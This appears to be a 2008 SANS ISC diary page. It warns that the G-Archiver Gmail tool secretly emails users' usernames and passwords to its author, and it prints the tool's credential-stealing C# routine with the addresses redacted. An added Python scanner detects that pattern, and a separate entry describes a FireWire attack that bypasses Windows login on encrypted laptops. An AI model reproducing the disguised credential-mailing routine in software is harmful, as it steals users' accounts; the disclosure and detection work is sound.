SANS ISC InfoSec Handlers Diary Blog



Pointsec Full Disk Encryption cracked

Published: 2008-03-12
Last Updated: 2008-03-13 15:07:51 UTC
by Joel Esler (Version: 3)

Castor, one of our readers, wrote in to let us know about this article over at DarkReading. (Clarification: DarkReading actually didn't write the article; it just came in through their news feed section. Thank you, Kelly, for writing me and letting me know.)

Headline: LuciData successfully cracks a laptop encrypted with Pointsec Full Disk Encryption on behalf of corporate client

Copy and Paste from article:

"This simple attack takes advantage of the FireWire protocol and its ability to directly access and modify the RAM of a target machine with a FireWire port installed. Using a simple and readily available forensics software tool, it is possible to connect a FireWire cable to a computer, and within seconds bypass the Windows authentication and log in as a local administrator.

This attack is made possible because the operating system on the computer loads and boots directly into Windows without first asking for a Pointsec ‘preboot authentication’ password. Normally, with whole disk encryption, a user is required to enter a password immediately upon turning the machine on. That password is what unlocks the decryption key and allows the rest of the operating system to load and execute. This FireWire attack would not be successful in that case, because the attack requires that Windows already be up and running. In the circumstance of a properly configured encrypted computer, a stolen system that is powered off would be well protected from unauthorized access and this type of attack."

The workaround for this, according to Pointsec (Check Point), is for administrators who have Pointsec deployed in their networks to re-deploy it with "Pre-boot authentication" enabled.

Update: Since this article seems to have generated a bit of controversy, I'll update it. A couple of points:

#1) It looks like LuciData is simply trying to throw their hat in the recent ring of "cracking" disk encryption through the FireWire interface. This is largely a marketing press release.

#2) It also appears not to be a new crack; at face value it looks like the same thing that we've been seeing for a couple of weeks now.

#3) I don't claim credit for the article. I thought it was at least newsworthy, since Pointsec put out a fix-it for the problem that probably should have been done to begin with.

So for all those people who were thinking that I endorsed the article or something, no.  I just thought it was interesting.


Joel Esler

http://www.joelesler.net


Adobe security updates

Published: 2008-03-12
Last Updated: 2008-03-12 19:34:40 UTC
by Joel Esler (Version: 1)

Don't use G-Archiver

Published: 2008-03-12
Last Updated: 2008-03-12 19:26:49 UTC
by Joel Esler (Version: 4)

I saw this article the other day on Coding Horror, and someone (they didn't leave their name) sent it in to us for comment. Let me just say up front.... there are some aspects of the Coding Horror article that neither we nor I condone or agree with, like deleting all the email and altering the account, etc., instead of contacting Law Enforcement or Google. That being said...

The backstory:

G-Archiver (notice I'm not linking to it) is a tool that someone wrote to be able to download all your Google Email and archive it locally. Problem is that the coder who wrote the program decided he'd be slick and put his own username and password in the code.

Whoops.

Yeah, but it wasn't a 'coding mistake'.  He coded it in there, so when someone used this tool, it uploaded YOUR username and password to HIS email account.  (Nice huh?)

Now, I'll put the code below, but I am going to (out of the kindness of my heart, because I am sure the account is probably canceled at this point) remove this dude's password.  Who knows, he might be using it elsewhere.


Here's the code:

using System;
using System.Net;
using System.Net.Mail;
using System.Text;

// Named as if it tested connectivity, but this routine never touches the
// user's own mailbox: it mails the caller-supplied credentials (a = username,
// b = password) to the author's account. Address and password are redacted
// here exactly as in the diary.
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        // Recipient and sender are both the author's Gmail account, not the user's.
        message.To.Add("JTexxxxx@gmail.com");
        message.From = new MailAddress("JTexxxxx@gmail.com", "JTexxx", Encoding.UTF8);
        message.Subject = "Account";
        message.SubjectEncoding = Encoding.UTF8;
        // The user's Gmail username and password become the message body.
        message.Body = "Username: " + a;
        message.Body = message.Body + "\r\nPassword: " + b;
        message.BodyEncoding = Encoding.UTF8;
        message.IsBodyHtml = false;
        message.Priority = MailPriority.High;
        SmtpClient client = new SmtpClient();
        // The author's own hard-coded credentials authenticate to Gmail's SMTP server.
        client.Credentials = new NetworkCredential("JTexxxxx@gmail.com", "HIS PASSWORD WAS RIGHT HERE");
        client.Port = 0x24b;  // 587, the mail submission port
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        client.Send(message);
    }
    catch (Exception)
    {
        // Any failure is swallowed silently, so the user never sees an error.
    }
}
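The routine above has a recognisable shape: hard-coded sender credentials, a fixed recipient, and the caller's username and password concatenated into the message body. As an added example (not from the diary and not part of G-Archiver), this Python scanner looks for exactly that combination in C# source or decompiler output; the sample it runs on is a constructed copy of the snippet with the same redactions, and the regex patterns are my own assumptions about how such code is typically written.

```python
import re

# Constructed sample in the shape of the G-Archiver routine quoted above,
# with the address and password redacted exactly as the diary redacts them.
SAMPLE_CS = r'''
public static void CheckConnection(string a, string b)
{
    MailMessage message = new MailMessage();
    message.To.Add("JTexxxxx@gmail.com");
    message.Body = "Username: " + a;
    message.Body = message.Body + "\r\nPassword: " + b;
    SmtpClient client = new SmtpClient();
    client.Credentials = new NetworkCredential("JTexxxxx@gmail.com", "HIS PASSWORD WAS RIGHT HERE");
    client.Host = "smtp.gmail.com";
    client.Send(message);
}
'''

# Literal sender credentials handed to the SMTP client.
CRED_LITERAL = re.compile(r'new\s+NetworkCredential\s*\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')
# Fixed outbound mail server and fixed recipient.
SMTP_HOST = re.compile(r'\.Host\s*=\s*"([^"]+)"')
MAIL_TO = re.compile(r'\.To\.Add\s*\(\s*"([^"]+)"\s*\)')
# A variable concatenated onto a "Username"/"Password" label in the message body.
SECRET_IN_BODY = re.compile(r'\.Body\s*=.*"[^"]*(?:Password|Username)[^"]*"\s*\+\s*(\w+)', re.I)


def scan_csharp(src: str) -> dict:
    """Collect each piece of the pattern from C# source (or decompiler output)."""
    return {
        "credentials": [m.groups() for m in CRED_LITERAL.finditer(src)],
        "smtp_hosts": SMTP_HOST.findall(src),
        "recipients": MAIL_TO.findall(src),
        "body_params": SECRET_IN_BODY.findall(src),
    }


def is_credential_exfil(findings: dict) -> bool:
    """Hard-coded sender credentials plus a fixed recipient plus caller-supplied
    values labelled Username/Password in the body is the exfiltration pattern;
    any one piece alone (e.g. a legitimate notification mailer) is not enough."""
    return bool(findings["credentials"] and findings["recipients"] and findings["body_params"])


if __name__ == "__main__":
    result = scan_csharp(SAMPLE_CS)
    print("credential exfiltration:", is_credential_exfil(result))
    for user, _ in result["credentials"]:
        print("hard-coded account:", user, "->", result["recipients"], "via", result["smtp_hosts"])
```

A hit is a reason to inspect the binary before deploying it, not proof on its own; the scanner deliberately requires all three pieces so that an ordinary mail-sending utility is not flagged.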


Basically, the lesson learned here is, be careful what you install.

So, to the anonymous person that wrote in asking for comment?  Here's my comment:  Don't install it.  Oh yeah, and "John", the coder of this tool...  Shame on you. 

UPDATE:  Someone wrote in and thought it to be a good idea to remove the actual email address. I complied.

Joel Esler

http://www.joelesler.net
